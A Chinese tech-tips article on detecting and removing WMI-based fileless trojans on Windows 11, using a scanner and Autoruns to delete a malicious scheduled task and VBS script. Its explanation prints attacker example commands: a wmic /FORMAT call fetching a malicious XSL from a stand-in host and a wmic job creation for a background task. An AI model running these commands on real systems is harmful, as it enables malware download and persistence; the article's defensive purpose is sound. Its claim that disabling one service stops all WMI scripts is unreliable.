怎么彻查Win11的WMI木马
2024-06-25 16:49:55阅读量:32 字体:大 中 小
WMI是一个windows11系统中非常核心的功能,我们可以通过运用这个功能来实现脚本部署、进程枚举、监控目录修改等常见的操作,但是总有一些不怀好意的人对此进行木马病毒的植入,一旦WMI被植入木马病毒,由于其特殊性,会对我们的系统造成非常严重的损伤,那么该如何解决这个问题呢?感兴趣的小伙伴们可以往下看看。

1. 了解WMI恶意软件的运行机制
如上所述,WMI具备的功能非常丰富,对于黑客来说只要利用其中的命令就可以完成很多操作。比如获得相应的权限后,在目标电脑上使用“wmic os get /FORMAT:"http://www.xxxx.com:80/123.xsl"”命令就可以实现从网站服务器上下载所需的恶意软件123.xsl(图1)。
当然在实际运行中,这些恶意软件还可以利用WMI进行更多的操作,如使用“wmic job call create "123.exe",0,0,true,false,********154800.000000+480”命令创建一个在后台运行的任务计划,甚至可以执行创建系统服务、将DLL文件注入系统进程等操作。因为这里使用的都是系统命令(wmic.exe),并不像常规的木马、病毒那样由本体执行,所以称之为“无文件”(严格来说是WMI脚本运行,脚本被触发后执行下载木马等操作)方式运行。比如臭名昭著的“KingMiner挖矿木马”,它通过WMI事件订阅来不断地触发木马在后台运行。
●火速链接:
本刊2018年6期文章《解决WMI进程资源占用的问题》介绍了WMI的相关知识。
2. 发现和识别WMI恶意软件
WMI木马的一个重要特性就是借助WMI脚本来下载或者激活木马运行。比如某WMI挖矿木马感染电脑后会在系统里生成一个任务计划,任务会在后台连接到服务器下载挖矿木马。挖矿木马运行后会占用系统大量的资源和带宽,导致Windows在日常使用时运行缓慢,网页打开速度也变得很慢,且电脑的硬盘指示灯一直在闪烁(因为木马会在后台不断地读取数据)。如果自己的电脑在使用时有上述的异常现象,那么就需要使用安全软件检查是否中了木马。
Windows 10用户可以先使用系统自带的“安全中心”进行查杀,如果无法解决问题则可以借助一些木马专杀软件,如火绒恶性木马专杀工具(https://bbs.huorong.cn/thread-18575-1-1.html)进行查杀,启动软件后点击“立即扫描”,常见的木马(包括WMI木马)一般都可以被自动查杀(图2)。
不过,如果中了WMI木马,安全软件只会将WMI脚本下载的木马文件删除,但是无法完全斩断WMI木马文件的下载途径,如上述介绍的WMI挖矿木马就是利用任务计划进行下载。因为任务计划中并没有恶意软件,安全软件是不会将其删除的,所以通过专杀软件删除木马后,每次重启系统扫描后还是一直提示发现木马文件,那么就极可能中了WMI木马,这时就还需要对系统的启动项进行检查,查看是否有异常的启动项。
系统启动项检查可以借助Autoruns来完成(https://docs.microsoft.com/zh-cn/sysinternals/downloads/autoruns),启动程序后它会自动对本机所有的启动项目进行检测,包括计划任务、服务、WMI等(图3)。
比如笔者公司的一台电脑在执行安全扫描时就发现木马文件无法彻底删除的现象,在本机运行Autoruns后切换到“计划任务”,在打开的窗口中就可以看到后台所有的任务计划。对于没有数字签名的任务,程序会使用浅红色进行标注,可以看到本机中一个名为“lsmosee”的任务极为可疑,它加载的是本机临时目录中的一个VBS文件(图4)。
在上图选中“lsmosee”并右击,选择“跳转到文件夹”,在打开的文件夹中根据图上“镜像路径”的提示,使用记事本打开“54236.vbs”文件,其中显示的正是一些WMI脚本的内容,它的作用就是在后台定时下载木马文件。现在按提示将其删除。接着返回上图,选中“lsmosee”任务并点击“删除”,这样就可以切断木马的下载通道。最后使用火绒安全软件再扫描一遍电脑,删除其他带毒的文件后,问题得到顺利的解决(图5)。
3. 一劳永逸封禁WMI木马下载
WMI木马难以查杀的原因就是由于它的下载方式是通过WMI脚本实现,而且WMI脚本激活的方法很多(如上例为任务计划,有些则是使用进程注入等),不过WMI脚本的运行要依赖“WMI Performance Adapter”服务,因此对于个人用户来说,可以通过停用服务的方法来禁止WMI脚本的运行。在桌面的任务栏搜索框中输入“服务”,打开服务管理组件后找到上述服务,双击打开后将其停止,并将其启动类型设置为“禁用”,这样本机所有的WMI脚本就无法运行了(图6)。
注意:
禁用WMI服务可能会导致一些网络服务无法使用。禁用服务如果影响电脑使用,请及时进行恢复。
上文就是小编为您带来的Win11 WMI木马查杀方法了,若还有疑问请多多关注谜爱阁生活网手机教程频道!
免责声明:
本文《怎么彻查Win11的WMI木马》版权归原作者所有,内容不代表本站立场!
如本文内容影响到您的合法权益(含文章中内容、图片等),请及时联系本站,我们会及时删除处理。
推荐阅读

快手号怎么修改不了,只有复制
快手号只有复制,修改不了,是因为近期已经修改过快手号了,从修改时开始需要等待90天后才能再次修改。修改快手号的具体操作方法如下: 快手号怎么修改不了,只有复制 1、打开手机快手app,点击左上角三条横...
阅读: 724

qq群怎么设置不让群成员加好友
qq群目前还不能设置不让群成员加好友,只能设置不让群里的人发起临时会话减少群员的互动性。设置不让群里的人发起临时会话的具体操作如下: qq群怎么设置不让群成员加好友 1、打开手机QQ软件,找到自己创建...
阅读: 706

朋友圈设置三天可见是对所有人吗
朋友圈三天可见是针对朋友圈的一个设置,针对所有的朋友,朋友圈设置三天可见后,所有朋友只能看到你最近三天的朋友圈。朋友圈设置三天可见的具体操作如下: 朋友圈设置三天可见是对所有人吗 1、打开手机微信ap...
阅读: 731

微信很小的那种表情包怎么做的
平常生活中微信很小的那种表情包可以在微信的小程序里根据自己的喜好进行制作,通过以下步骤制作微信表情包: 微信很小的那种表情包怎么做的 1、打开微信,切换到发现页面,点击小程序”进入小程序页...
阅读: 1365

剪映怎么在中间插视频
想要使用剪映视频中间插入另一个视频,可以把原本视频分割再插入新的视频,通过以下步骤使用剪映在中间插视频: 剪映怎么在中间插视频 1、打开剪映,点击开始创作”进入选择页面。 2、选择一个视...
阅读: 754

qq进群特效怎么关闭
想要关闭qq进群特效,可以在qq群的进群特效相关功能进行关闭,开通超级会员才能享受进群特效,通过以下步骤关闭qq进群特效: qq进群特效怎么关闭 1、打开qq,点击qq群”进入qq群聊天页...
阅读: 700
热门文章
1.怎么知道对方关闭了活跃状态
- 1

- 怎么知道对方关闭了活跃状态
- 2022-12-28
- 1
2.上海公交车微信扫码支付步骤
- 2

- 上海公交车微信扫码支付步骤
- 2022-12-28
- 2
3.支付宝怎么设置花呗收款开关
- 3

- 支付宝怎么设置花呗收款开关
- 2022-12-28
- 3
4.剪映怎么局部变色
- 4

- 剪映怎么局部变色
- 2022-12-28
- 4
5.微利贷怎么申请开通
- 5

- 微利贷怎么申请开通
- 2022-12-28
- 5
6.微信怎么转发大量聊天记录
- 6

- 微信怎么转发大量聊天记录
- 2022-12-28
- 6
7.手机美图秀秀怎么移动文字
- 7

- 手机美图秀秀怎么移动文字
- 2022-12-28
- 7
8.快手怎么看不到动态消息私信
- 8

- 快手怎么看不到动态消息私信
- 2022-12-28
- 8
9.天眼查询个人信息怎么查
- 9

- 天眼查询个人信息怎么查
- 2022-12-28
- 9
10.快手登陆手机号不用了收不到验证码怎么办
- 10

- 快手登陆手机号不用了收不到验证码怎么办
- 2022-12-28
- 10
最近更新

酷狗音乐中使用蝰蛇音效制作工具的具体操作方法
2024-11-11

win7电脑中出现声音图标不见了的具体解决方法
2024-11-11

车到哪app的详细软件介绍
2024-11-11

小米9se中查看序列号的具体操作方法
2024-11-11

迅雷中使用FTP探测器的详细操作方法
2024-11-11

ppt制作出小荷才露尖尖角动画场景的具体操作步骤
2024-11-11
